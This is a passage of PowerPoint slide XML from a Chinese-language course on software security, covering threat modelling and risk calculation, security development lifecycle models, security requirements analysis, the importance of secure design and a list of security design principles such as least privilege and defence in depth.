            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估攻击后资产的受损后果，并计算风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比较简单的直接使用ALE（年度预期损失）来评价</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>危险=发生概率×潜在的损失。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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威胁建模-消减威胁</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383790" y="1402715"/>
            <a:ext cx="6096000" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重新设计并排除这个威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用标准的威胁消减技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发明新的消减方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据安全Bug标准来确定是否可接受风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>把威胁作为漏洞记录下来，以后再想办法消减</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="爆炸形 1 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118995" y="3698875"/>
            <a:ext cx="6191250" cy="3275965"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>要想办法消减</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每个威胁！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全需求及设计</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软件安全开发生命</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>周期</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909320" y="1726565"/>
            <a:ext cx="10165715" cy="341503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软件生命周期模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了解软件生命周期的概念及瀑布模型、迭代模型、增量模型、快速原型模型、螺旋模型、净室模型等典型软件开发生命周期模型。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件危机与安全问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了解三次软件危机产生的原因、特点和解决方案；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了解软件安全和软件安全保障的基本概念。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全生命周期模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了解SDL、CLASP、CMMI、SAMM、BSIMM等典型的软件安全开发生命周期模型。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需求分析</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185670" y="1355090"/>
            <a:ext cx="7289800" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全需求分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全功能需求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全保障需求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需求分析的要点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全需求进行有效定义</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不仅考虑系统功能，还要考虑系统不应该做什么</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>功能需求、安全需求、安全目标要达到平衡</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219325" y="4740275"/>
            <a:ext cx="6657975" cy="1323975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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需求分析过程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180590" y="1675765"/>
            <a:ext cx="6096000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统调查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定性分析系统的脆弱点和可能遭受的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脆弱点和安全威胁的定量分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需求的确定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2180590" y="3896360"/>
            <a:ext cx="6934200" cy="1609725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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安全设计的重要性</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805815" y="1722755"/>
            <a:ext cx="6215380" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全编码？安全测试？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传统方法：软件发布后测试、等待修复Bug</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>GaryMcGraw：50%的安全问题由设计瑕疵引起</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全提前介入，效益高，成本低</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666240" y="3475990"/>
            <a:ext cx="6372225" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805815" y="4161790"/>
            <a:ext cx="6096000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设计缺陷——举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>MicrosoftBob</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>明文存储口令，甚至将口令拿到客户端对比验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390765" y="4250690"/>
            <a:ext cx="2307590" cy="2348865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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软件安全设计</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828040" y="1797050"/>
            <a:ext cx="10749280" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全概要设计阶段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包括但不限于：安全体系结构设计、各功能块间的处理流程、与其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>他功能的关系、安全协议设计、安全接口设计等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="3429000"/>
            <a:ext cx="10749280" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全详细设计阶段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>详细设计阶段作为安全功能的程序设计阶段，应当直接指导安全功能的编码工作。包括但不限于：模块设计、内部处理流程、数据结构、输入/输出项、算法、逻辑流程图等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543175" y="4925060"/>
            <a:ext cx="6829425" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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安全设计的主要活动</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068070" y="1919605"/>
            <a:ext cx="6096000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>详细风险评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制措施选择</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全技术实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全设计评审</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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安全设计原则</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854710" y="1882140"/>
            <a:ext cx="4050665" cy="3830955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最小特权原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>权限分离原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最少共享机制原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完全中立原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>心理可接受度原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>默认故障处理保护原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>经济机制原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不信任原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>纵深防御原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858510" y="2009140"/>
            <a:ext cx="4050665" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保护最薄弱环节原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公开设计原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐私保护原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击面最小化原则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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最小特权原则</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821180"/>
            <a:ext cx="9401175" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用：降低被攻击后果，使影响范围有限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
